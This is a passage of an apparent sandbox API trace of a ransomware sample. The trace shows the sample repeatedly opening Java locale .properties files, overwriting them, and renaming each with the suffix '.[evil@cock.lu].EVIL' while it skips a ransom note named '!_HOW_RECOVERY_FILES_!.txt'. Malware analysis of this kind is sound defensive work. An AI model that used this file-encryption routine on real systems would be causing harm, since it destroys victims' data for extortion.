lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd60, lpOverlapped=0x0) returned 1 [0094.444] CloseHandle (hObject=0x1a8) returned 1 [0094.444] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.444] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.444] __uncaught_exception () returned 0x84b1160800 [0094.444] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.444] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties.[evil@cock.lu].evil")) returned 1 [0094.445] ??_V@YAXPEAX@Z () returned 0x1 [0094.449] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties", dwFileAttributes=0x0) returned 0 [0094.449] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.449] wcsstr (_Str="messages_it.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.449] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties") returned 69 [0094.449] wcscmp (_String1="messages_it.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.449] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_it.properties") returned 0x0 [0094.449] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties") returned 0x45 [0094.449] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.452] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc97, lpOverlapped=0x0) returned 1 [0094.455] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.455] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.455] _errno () returned 0x84b1160840 [0094.455] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.455] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xca0, lpOverlapped=0x0) returned 1 [0094.455] CloseHandle (hObject=0x1a8) returned 1 [0094.455] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.456] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.456] __uncaught_exception () returned 0x84b1160800 [0094.456] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.456] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties.[evil@cock.lu].evil")) returned 1 [0094.457] ??_V@YAXPEAX@Z () returned 0x1 [0094.461] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties", dwFileAttributes=0x0) returned 0 [0094.461] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.461] wcsstr (_Str="messages_ja.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.461] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties") returned 69 [0094.461] wcscmp (_String1="messages_ja.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.461] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_ja.properties") returned 0x0 [0094.461] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties") returned 0x45 [0094.461] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.464] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x18cd, lpOverlapped=0x0) returned 1 [0094.467] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.467] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.467] _errno () returned 0x84b1160840 [0094.467] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.467] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x18e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x18e0, lpOverlapped=0x0) returned 1 [0094.467] CloseHandle (hObject=0x1a8) returned 1 [0094.467] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.468] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.468] __uncaught_exception () returned 0x84b1160800 [0094.468] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.468] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties.[evil@cock.lu].evil")) returned 1 [0094.469] ??_V@YAXPEAX@Z () returned 0x1 [0094.473] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties", dwFileAttributes=0x0) returned 0 [0094.473] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.473] wcsstr (_Str="messages_ko.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.473] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties") returned 69 [0094.473] wcscmp (_String1="messages_ko.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.473] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_ko.properties") returned 0x0 [0094.473] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties") returned 0x45 [0094.473] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.475] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1650, lpOverlapped=0x0) returned 1 [0094.478] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.479] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.479] _errno () returned 0x84b1160840 [0094.479] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.479] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1660, lpOverlapped=0x0) returned 1 [0094.479] CloseHandle (hObject=0x1a8) returned 1 [0094.479] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.479] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.479] __uncaught_exception () returned 0x84b1160800 [0094.479] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.480] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties.[evil@cock.lu].evil")) returned 1 [0094.480] ??_V@YAXPEAX@Z () returned 0x1 [0094.484] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties", dwFileAttributes=0x0) returned 0 [0094.484] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.484] wcsstr (_Str="messages_pt_BR.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.484] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_pt_BR.properties") returned 72 [0094.484] wcscmp (_String1="messages_pt_BR.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.484] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_pt_BR.properties") returned 0x0 [0094.484] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_pt_BR.properties") returned 0x48 [0094.484] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.487] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcd5, lpOverlapped=0x0) returned 1 [0094.491] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.491] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.491] _errno () returned 0x84b1160840 [0094.491] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.491] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xce0, lpOverlapped=0x0) returned 1 [0094.491] CloseHandle (hObject=0x1a8) returned 1 [0094.491] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_pt_BR.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.491] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.491] __uncaught_exception () returned 0x84b1160800 [0094.491] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.492] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_pt_br.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_pt_BR.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_pt_br.properties.[evil@cock.lu].evil")) returned 1 [0094.492] ??_V@YAXPEAX@Z () returned 0x1 [0094.496] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_pt_BR.properties", dwFileAttributes=0x0) returned 0 [0094.496] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.496] wcsstr (_Str="messages_sv.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.497] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties") returned 69 [0094.497] wcscmp (_String1="messages_sv.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.497] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_sv.properties") returned 0x0 [0094.497] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties") returned 0x45 [0094.497] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.499] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd51, lpOverlapped=0x0) returned 1 [0094.504] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.504] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.504] _errno () returned 0x84b1160840 [0094.504] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.504] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd60, lpOverlapped=0x0) returned 1 [0094.504] CloseHandle (hObject=0x1a8) returned 1 [0094.504] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.504] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.505] __uncaught_exception () returned 0x84b1160800 [0094.505] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.505] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties.[evil@cock.lu].evil")) returned 1 [0094.505] ??_V@YAXPEAX@Z () returned 0x1 [0094.509] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties", dwFileAttributes=0x0) returned 0 [0094.509] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.509] wcsstr (_Str="messages_zh_CN.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.509] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_CN.properties") returned 72 [0094.509] wcscmp (_String1="messages_zh_CN.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.509] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_zh_CN.properties") returned 0x0 [0094.510] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_CN.properties") returned 0x48 [0094.510] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.512] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfe8, lpOverlapped=0x0) returned 1 [0094.515] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.515] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.515] _errno () returned 0x84b1160840 [0094.515] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.515] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1000, lpOverlapped=0x0) returned 1 [0094.515] CloseHandle (hObject=0x1a8) returned 1 [0094.516] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_CN.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.516] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.516] __uncaught_exception () returned 0x84b1160800 [0094.516] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.516] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_zh_cn.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_CN.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_zh_cn.properties.[evil@cock.lu].evil")) returned 1 [0094.517] ??_V@YAXPEAX@Z () returned 0x1 [0094.521] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_CN.properties", dwFileAttributes=0x0) returned 0 [0094.521] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.521] wcsstr (_Str="messages_zh_HK.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.521] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_HK.properties") returned 72 [0094.521] wcscmp (_String1="messages_zh_HK.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.521] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_zh_HK.properties") returned 0x0 [0094.521] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_HK.properties") returned 0x48 [0094.521] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.524] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xea8, lpOverlapped=0x0) returned 1 [0094.527] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.527] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.527] _errno () returned 0x84b1160840 [0094.527] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.527] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xec0, lpOverlapped=0x0) returned 1 [0094.527] CloseHandle (hObject=0x1a8) returned 1 [0094.527] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_HK.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.528] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.528] __uncaught_exception () returned 0x84b1160800 [0094.528] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.528] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_zh_hk.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_HK.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_zh_hk.properties.[evil@cock.lu].evil")) returned 1 [0094.529] ??_V@YAXPEAX@Z () returned 0x1 [0094.532] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_HK.properties", dwFileAttributes=0x0) returned 0 [0094.532] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.532] wcsstr (_Str="messages_zh_TW.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.532] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_TW.properties") returned 72 [0094.533] wcscmp (_String1="messages_zh_TW.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.533] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="messages_zh_TW.properties") returned 0x0 [0094.533] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_TW.properties") returned 0x48 [0094.533] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.536] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xea8, lpOverlapped=0x0) returned 1 [0094.539] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.539] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.539] _errno () returned 0x84b1160840 [0094.539] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.539] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xec0, lpOverlapped=0x0) returned 1 [0094.539] CloseHandle (hObject=0x1a8) returned 1 [0094.539] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_TW.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.540] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.540] __uncaught_exception () returned 0x84b1160800 [0094.540] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.540] MoveFileW 